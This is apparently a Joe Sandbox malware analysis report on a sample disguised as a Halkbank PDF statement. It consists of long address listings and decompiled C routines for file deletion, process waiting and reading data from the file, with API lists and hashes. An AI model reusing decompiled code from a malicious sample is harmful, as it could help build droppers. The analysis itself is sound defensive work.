                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00000000
                                                                    0x00406eb1
                                                                    0x00406eb1
                                                                    0x00406eb5
                                                                    0x00407575
                                                                    0x00000000
                                                                    0x00407575
                                                                    0x00406ebb
                                                                    0x00406ebe
                                                                    0x00406ec1
                                                                    0x00406ec5
                                                                    0x00406ec8
                                                                    0x00406ece
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed3
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406ed6
                                                                    0x00406edc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ede
                                                                    0x00406ee1
                                                                    0x00406ee4
                                                                    0x00406ee7
                                                                    0x00406eea
                                                                    0x00406eed
                                                                    0x00406ef0
                                                                    0x00406ef3
                                                                    0x00406ef6
                                                                    0x00406ef9
                                                                    0x00406efc
                                                                    0x00406f14
                                                                    0x00406f17
                                                                    0x00406f1a
                                                                    0x00406f1d
                                                                    0x00406f1d
                                                                    0x00406f20
                                                                    0x00406f24
                                                                    0x00406f26
                                                                    0x00406efe
                                                                    0x00406efe
                                                                    0x00406f06
                                                                    0x00406f0b
                                                                    0x00406f0d
                                                                    0x00406f0f
                                                                    0x00406f0f
                                                                    0x00406f29
                                                                    0x00406f30
                                                                    0x00406f33
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00000000
                                                                    0x00406f35
                                                                    0x00406f33
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f75
                                                                    0x00406f75
                                                                    0x00406f79
                                                                    0x00407581
                                                                    0x00000000
                                                                    0x00407581
                                                                    0x00406f7f
                                                                    0x00406f82
                                                                    0x00406f85
                                                                    0x00406f89
                                                                    0x00406f8c
                                                                    0x00406f92
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f97
                                                                    0x00406f9a
                                                                    0x00406f9a
                                                                    0x00406fa0
                                                                    0x00406f3e
                                                                    0x00406f3e
                                                                    0x00406f41
                                                                    0x00000000
                                                                    0x00406f41
                                                                    0x00406fa2
                                                                    0x00406fa2
                                                                    0x00406fa5
                                                                    0x00406fa8
                                                                    0x00406fab
                                                                    0x00406fae
                                                                    0x00406fb1
                                                                    0x00406fb4
                                                                    0x00406fb7
                                                                    0x00406fba
                                                                    0x00406fbd
                                                                    0x00406fc0
                                                                    0x00406fd8
                                                                    0x00406fdb
                                                                    0x00406fde
                                                                    0x00406fe1
                                                                    0x00406fe1
                                                                    0x00406fe4
                                                                    0x00406fe8
                                                                    0x00406fea
                                                                    0x00406fc2
                                                                    0x00406fc2
                                                                    0x00406fca
                                                                    0x00406fcf
                                                                    0x00406fd1
                                                                    0x00406fd3
                                                                    0x00406fd3
                                                                    0x00406fed
                                                                    0x00406ff4
                                                                    0x00406ff7
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00000000
                                                                    0x00407286
                                                                    0x00407286
                                                                    0x0040728a
                                                                    0x004075b1
                                                                    0x00000000
                                                                    0x004075b1
                                                                    0x00407290
                                                                    0x00407293
                                                                    0x00407296
                                                                    0x0040729a
                                                                    0x0040729d
                                                                    0x004072a3
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407056
                                                                    0x00407056
                                                                    0x00407059
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x00407395
                                                                    0x00407399
                                                                    0x004073bb
                                                                    0x004073be
                                                                    0x004073c8
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x00000000
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x0040739b
                                                                    0x0040739e
                                                                    0x004073a2
                                                                    0x004073a5
                                                                    0x004073a5
                                                                    0x004073a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407452
                                                                    0x00407456
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x0040747b
                                                                    0x00407482
                                                                    0x00407489
                                                                    0x00407489
                                                                    0x00000000
                                                                    0x00407489
                                                                    0x00407458
                                                                    0x0040745b
                                                                    0x0040745e
                                                                    0x00407461
                                                                    0x00407468
                                                                    0x004073ac
                                                                    0x004073ac
                                                                    0x004073af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407543
                                                                    0x00407546
                                                                    0x00407447
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040717d
                                                                    0x0040717f
                                                                    0x00407186
                                                                    0x00407187
                                                                    0x00407189
                                                                    0x0040718c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407194
                                                                    0x00407197
                                                                    0x0040719a
                                                                    0x0040719c
                                                                    0x0040719e
                                                                    0x0040719e
                                                                    0x0040719f
                                                                    0x004071a2
                                                                    0x004071a9
                                                                    0x004071ac
                                                                    0x004071ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407490
                                                                    0x00407490
                                                                    0x00407493
                                                                    0x0040749a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040749f
                                                                    0x0040749f
                                                                    0x004074a3
                                                                    0x004075db
                                                                    0x00000000
                                                                    0x004075db
                                                                    0x004074a9
                                                                    0x004074ac
                                                                    0x004074af
                                                                    0x004074b3
                                                                    0x004074b6
                                                                    0x004074bc
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074c1
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c7
                                                                    0x004074c7
                                                                    0x004074cb
                                                                    0x0040752b
                                                                    0x0040752e
                                                                    0x00407533
                                                                    0x00407534
                                                                    0x00407536
                                                                    0x00407538
                                                                    0x0040753b
                                                                    0x00407447
                                                                    0x00407447
                                                                    0x00000000
                                                                    0x0040744d
                                                                    0x00407447
                                                                    0x004074cd
                                                                    0x004074d3
                                                                    0x004074d6
                                                                    0x004074d9
                                                                    0x004074dc
                                                                    0x004074df
                                                                    0x004074e2
                                                                    0x004074e5
                                                                    0x004074e8
                                                                    0x004074eb
                                                                    0x004074ee
                                                                    0x00407507
                                                                    0x0040750a
                                                                    0x0040750d
                                                                    0x00407510
                                                                    0x00407514
                                                                    0x00407516
                                                                    0x00407516
                                                                    0x00407517
                                                                    0x0040751a
                                                                    0x004074f0
                                                                    0x004074f0
                                                                    0x004074f8
                                                                    0x004074fd
                                                                    0x004074ff
                                                                    0x00407502
                                                                    0x00407502
                                                                    0x0040751d
                                                                    0x00407524
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x00407526
                                                                    0x00000000
                                                                    0x004071c2
                                                                    0x004071c5
                                                                    0x004071fb
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732b
                                                                    0x0040732e
                                                                    0x0040732e
                                                                    0x00407331
                                                                    0x00407333
                                                                    0x004075bd
                                                                    0x00000000
                                                                    0x004075bd
                                                                    0x00407339
                                                                    0x0040733c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407342
                                                                    0x00407346
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00407349
                                                                    0x00000000
                                                                    0x00407349
                                                                    0x004071c7
                                                                    0x004071c9
                                                                    0x004071cb
                                                                    0x004071cd
                                                                    0x004071d0
                                                                    0x004071d1
                                                                    0x004071d3
                                                                    0x004071d5
                                                                    0x004071d8
                                                                    0x004071db
                                                                    0x004071f1
                                                                    0x004071f6
                                                                    0x0040722e
                                                                    0x0040722e
                                                                    0x00407232
                                                                    0x0040725e
                                                                    0x00407260
                                                                    0x00407267
                                                                    0x0040726a
                                                                    0x0040726d
                                                                    0x0040726d
                                                                    0x00407272
                                                                    0x00407272
                                                                    0x00407274
                                                                    0x00407277
                                                                    0x0040727e
                                                                    0x00407281
                                                                    0x004072ae
                                                                    0x004072ae
                                                                    0x004072b1
                                                                    0x004072b4
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00407328
                                                                    0x00000000
                                                                    0x00407328
                                                                    0x004072b6
                                                                    0x004072bc
                                                                    0x004072bf
                                                                    0x004072c2
                                                                    0x004072c5
                                                                    0x004072c8
                                                                    0x004072cb
                                                                    0x004072ce
                                                                    0x004072d1
                                                                    0x004072d4
                                                                    0x004072d7
                                                                    0x004072f0
                                                                    0x004072f2
                                                                    0x004072f5
                                                                    0x004072f6
                                                                    0x004072f9
                                                                    0x004072fb
                                                                    0x004072fe
                                                                    0x00407300
                                                                    0x00407302
                                                                    0x00407305
                                                                    0x00407307
                                                                    0x0040730a
                                                                    0x0040730e
                                                                    0x00407310
                                                                    0x00407310
                                                                    0x00407311
                                                                    0x00407314
                                                                    0x00407317
                                                                    0x004072d9
                                                                    0x004072d9
                                                                    0x004072e1
                                                                    0x004072e6
                                                                    0x004072e8
                                                                    0x004072eb
                                                                    0x004072eb
                                                                    0x0040731a
                                                                    0x00407321
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x004072ab
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00407321
                                                                    0x00407234
                                                                    0x00407237
                                                                    0x00407239
                                                                    0x0040723c
                                                                    0x0040723f
                                                                    0x00407242
                                                                    0x00407244
                                                                    0x00407247
                                                                    0x0040724a
                                                                    0x0040724a
                                                                    0x0040724d
                                                                    0x0040724d
                                                                    0x00407250
                                                                    0x00407257
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x0040722b
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00000000
                                                                    0x00407259
                                                                    0x00407257
                                                                    0x004071dd
                                                                    0x004071e0
                                                                    0x004071e2
                                                                    0x004071e5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406f44
                                                                    0x00406f44
                                                                    0x00406f48
                                                                    0x0040758d
                                                                    0x00000000
                                                                    0x0040758d
                                                                    0x00406f4e
                                                                    0x00406f51
                                                                    0x00406f54
                                                                    0x00406f57
                                                                    0x00406f5a
                                                                    0x00406f5d
                                                                    0x00406f60
                                                                    0x00406f62
                                                                    0x00406f65
                                                                    0x00406f68
                                                                    0x00406f6b
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070cf
                                                                    0x004070cf
                                                                    0x004070d3
                                                                    0x00407599
                                                                    0x00000000
                                                                    0x00407599
                                                                    0x004070d9
                                                                    0x004070dc
                                                                    0x004070df
                                                                    0x004070e2
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e7
                                                                    0x004070ea
                                                                    0x004070ed
                                                                    0x004070f0
                                                                    0x004070f3
                                                                    0x004070f6
                                                                    0x004070f7
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070fc
                                                                    0x004070ff
                                                                    0x00407102
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407108
                                                                    0x0040710a
                                                                    0x0040710a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x0040734c
                                                                    0x00407350
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407356
                                                                    0x00407359
                                                                    0x0040735c
                                                                    0x0040735f
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407361
                                                                    0x00407364
                                                                    0x00407367
                                                                    0x0040736a
                                                                    0x0040736d
                                                                    0x00407370
                                                                    0x00407373
                                                                    0x00407374
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407376
                                                                    0x00407379
                                                                    0x0040737c
                                                                    0x0040737f
                                                                    0x00407382
                                                                    0x00407385
                                                                    0x00407389
                                                                    0x0040738b
                                                                    0x0040738e
                                                                    0x00000000
                                                                    0x00407390
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x00000000
                                                                    0x0040710d
                                                                    0x0040738e
                                                                    0x004075c3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x004075fa
                                                                    0x004075fa
                                                                    0x00000000
                                                                    0x004075fa
                                                                    0x00407447
                                                                    0x004073ce
                                                                    0x004073cb

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                    • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                    • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                    • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 41%
                                                                    			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                                                                    				int _t9;
                                                                    				long _t13;
                                                                    				WCHAR* _t14;
                                                                    
                                                                    				_t14 = _a4;
                                                                    				_t13 = E00406133(_t14);
                                                                    				if(_t13 == 0xffffffff) {
                                                                    					L8:
                                                                    					return 0;
                                                                    				}
                                                                    				_push(_t14);
                                                                    				if((_a8 & 0x00000001) == 0) {
                                                                    					_t9 = DeleteFileW();
                                                                    				} else {
                                                                    					_t9 = RemoveDirectoryW(); // executed
                                                                    				}
                                                                    				if(_t9 == 0) {
                                                                    					if((_a8 & 0x00000004) == 0) {
                                                                    						SetFileAttributesW(_t14, _t13);
                                                                    					}
                                                                    					goto L8;
                                                                    				} else {
                                                                    					return 1;
                                                                    				}
                                                                    			}






                                                                    0x00405d2d
                                                                    0x00405d38
                                                                    0x00405d3d
                                                                    0x00405d6d
                                                                    0x00000000
                                                                    0x00405d6d
                                                                    0x00405d44
                                                                    0x00405d45
                                                                    0x00405d4f
                                                                    0x00405d47
                                                                    0x00405d47
                                                                    0x00405d47
                                                                    0x00405d57
                                                                    0x00405d63
                                                                    0x00405d67
                                                                    0x00405d67
                                                                    0x00000000
                                                                    0x00405d59
                                                                    0x00000000
                                                                    0x00405d5b

                                                                    APIs
                                                                      • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                      • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                    • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: File$Attributes$DeleteDirectoryRemove
                                                                    • String ID:
                                                                    • API String ID: 1655745494-0
                                                                    • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                    • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                                    • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                    • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00406AE0(void* __ecx, void* _a4) {
                                                                    				long _v8;
                                                                    				long _t6;
                                                                    
                                                                    				_t6 = WaitForSingleObject(_a4, 0x64);
                                                                    				while(_t6 == 0x102) {
                                                                    					E00406A71(0xf);
                                                                    					_t6 = WaitForSingleObject(_a4, 0x64);
                                                                    				}
                                                                    				GetExitCodeProcess(_a4,  &_v8); // executed
                                                                    				return _v8;
                                                                    			}





                                                                    0x00406af1
                                                                    0x00406b08
                                                                    0x00406afc
                                                                    0x00406b06
                                                                    0x00406b06
                                                                    0x00406b13
                                                                    0x00406b1f

                                                                    APIs
                                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                                    • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: ObjectSingleWait$CodeExitProcess
                                                                    • String ID:
                                                                    • API String ID: 2567322000-0
                                                                    • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                    • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                                    • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                    • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                    				long _v8;
                                                                    				long _t21;
                                                                    				long _t22;
                                                                    				void* _t24;
                                                                    				long _t26;
                                                                    				int _t27;
                                                                    				long _t28;
                                                                    				void* _t29;
                                                                    				void* _t30;
                                                                    				long _t31;
                                                                    				long _t32;
                                                                    				long _t36;
                                                                    
                                                                    				_t21 = _a4;
                                                                    				if(_t21 >= 0) {
                                                                    					_t32 = _t21 +  *0x42a2b8;
                                                                    					 *0x420ef4 = _t32;
                                                                    					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                    				}
                                                                    				_t22 = E00403479(4);
                                                                    				if(_t22 >= 0) {
                                                                    					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                                    					if(_t24 == 0) {
                                                                    						L18:
                                                                    						_push(0xfffffffd);
                                                                    						goto L19;
                                                                    					} else {
                                                                    						 *0x420ef4 =  *0x420ef4 + 4;
                                                                    						_t36 = E00403479(_a4);
                                                                    						if(_t36 < 0) {
                                                                    							L21:
                                                                    							_t22 = _t36;
                                                                    						} else {
                                                                    							if(_a12 != 0) {
                                                                    								_t26 = _a4;
                                                                    								if(_t26 >= _a16) {
                                                                    									_t26 = _a16;
                                                                    								}
                                                                    								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                    								if(_t27 != 0) {
                                                                    									_t36 = _v8;
                                                                    									 *0x420ef4 =  *0x420ef4 + _t36;
                                                                    									goto L21;
                                                                    								} else {
                                                                    									goto L18;
                                                                    								}
                                                                    							} else {
                                                                    								if(_a4 <= 0) {
                                                                    									goto L21;
                                                                    								} else {
                                                                    									while(1) {
                                                                    										_t28 = _a4;
                                                                    										if(_a4 >= 0x4000) {
                                                                    											_t28 = 0x4000;
                                                                    										}
                                                                    										_v8 = _t28;
                                                                    										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                                                    										if(_t29 == 0) {
                                                                    											goto L18;
                                                                    										}
                                                                    										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                                    										if(_t30 == 0) {
                                                                    											_push(0xfffffffe);
                                                                    											L19:
                                                                    											_pop(_t22);
                                                                    										} else {
                                                                    											_t31 = _v8;
                                                                    											_a4 = _a4 - _t31;
                                                                    											 *0x420ef4 =  *0x420ef4 + _t31;
                                                                    											_t36 = _t36 + _t31;
                                                                    											if(_a4 > 0) {
                                                                    												continue;
                                                                    											} else {
                                                                    												goto L21;
                                                                    											}
                                                                    										}
                                                                    										goto L22;
                                                                    									}
                                                                    									goto L18;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L22:
                                                                    				return _t22;
                                                                    			}















                                                                    0x00403375
                                                                    0x0040337e
                                                                    0x00403387
                                                                    0x0040338b
                                                                    0x00403396
                                                                    0x00403396
                                                                    0x0040339e
                                                                    0x004033a5
                                                                    0x004033b7
                                                                    0x004033be
                                                                    0x00403463
                                                                    0x00403463
                                                                    0x00000000
                                                                    0x004033c4
                                                                    0x004033c7
                                                                    0x004033d3
                                                                    0x004033d7
                                                                    0x00403471
                                                                    0x00403471
                                                                    0x004033dd
                                                                    0x004033e0
                                                                    0x0040343f
                                                                    0x00403445
                                                                    0x00403447
                                                                    0x00403447
                                                                    0x00403459
                                                                    0x00403461
                                                                    0x00403468
                                                                    0x0040346b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004033e2
                                                                    0x004033e5
                                                                    0x00000000
                                                                    0x004033eb
                                                                    0x004033f0
                                                                    0x004033f7
                                                                    0x004033fa
                                                                    0x004033fc
                                                                    0x004033fc
                                                                    0x00403409
                                                                    0x0040340c
                                                                    0x00403413
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040341c
                                                                    0x00403423
                                                                    0x0040343b
                                                                    0x00403465
                                                                    0x00403465
                                                                    0x00403425
                                                                    0x00403425
                                                                    0x00403428
                                                                    0x0040342b
                                                                    0x00403431
                                                                    0x00403437
                                                                    0x00000000
                                                                    0x00403439
                                                                    0x00000000
                                                                    0x00403439
                                                                    0x00403437
                                                                    0x00000000
                                                                    0x00403423
                                                                    0x00000000
                                                                    0x004033f0
                                                                    0x004033e5
                                                                    0x004033e0
                                                                    0x004033d7
                                                                    0x004033be
                                                                    0x00403473
                                                                    0x00403476

                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                    • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                    • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                    • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 69%
                                                                    			E00401389(signed int _a4) {
                                                                    				intOrPtr* _t6;
                                                                    				void* _t8;
                                                                    				void* _t10;
                                                                    				signed int _t11;
                                                                    				void* _t12;
                                                                    				signed int _t16;
                                                                    				signed int _t17;
                                                                    				void* _t18;
                                                                    
                                                                    				_t17 = _a4;
                                                                    				while(_t17 >= 0) {
                                                                    					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                    					if( *_t6 == 1) {
                                                                    						break;
                                                                    					}
                                                                    					_push(_t6); // executed
                                                                    					_t8 = E00401434(); // executed
                                                                    					if(_t8 == 0x7fffffff) {
                                                                    						return 0x7fffffff;
                                                                    					}
                                                                    					_t10 = E0040136D(_t8);
                                                                    					if(_t10 != 0) {
                                                                    						_t11 = _t10 - 1;
                                                                    						_t16 = _t17;
                                                                    						_t17 = _t11;
                                                                    						_t12 = _t11 - _t16;
                                                                    					} else {
                                                                    						_t12 = _t10 + 1;
                                                                    						_t17 = _t17 + 1;
                                                                    					}
                                                                    					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                    						 *0x42924c =  *0x42924c + _t12;
                                                                    						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                                                                    					}
                                                                    				}
                                                                    				return 0;
                                                                    			}











                                                                    0x0040138a
                                                                    0x004013fa
                                                                    0x0040139b
                                                                    0x004013a0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004013a2
                                                                    0x004013a3
                                                                    0x004013ad
                                                                    0x00000000
                                                                    0x00401404
                                                                    0x004013b0
                                                                    0x004013b7
                                                                    0x004013bd
                                                                    0x004013be
                                                                    0x004013c0
                                                                    0x004013c2
                                                                    0x004013b9
                                                                    0x004013b9
                                                                    0x004013ba
                                                                    0x004013ba
                                                                    0x004013c9
                                                                    0x004013cb
                                                                    0x004013f4
                                                                    0x004013f4
                                                                    0x004013c9
                                                                    0x00000000

                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                    Memory Dump Source
